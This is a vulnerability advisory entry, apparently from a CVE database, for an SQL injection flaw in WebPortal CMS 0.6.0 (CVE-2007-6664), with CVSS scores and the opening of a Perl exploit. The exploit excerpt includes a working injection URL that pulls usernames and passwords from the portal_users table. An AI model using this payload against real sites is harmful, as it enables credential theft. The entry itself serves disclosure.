7.5
CVSSv2

CVE-2007-6664

Published: 04/01/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in WebPortal CMS 0.6.0 and previous versions allows remote malicious users to execute arbitrary SQL commands via the m parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

webportal webportal cms

Exploits

#!/usr/bin/perl -w # WebPortal CMS <= 060 Remote Sql Injection Exploit # Script Site : webportalivanoculminecom # by x0kster - x0kster[AT]gmail[DOT]com # PoC : site/indexphp?m=indexphp?m=-1'+union+select+1,concat(uname,0x3a,pass),3,4,5,6,7+from+portal_users+where+id=1/* # Note : For work register_globals is must be turned on and wa ...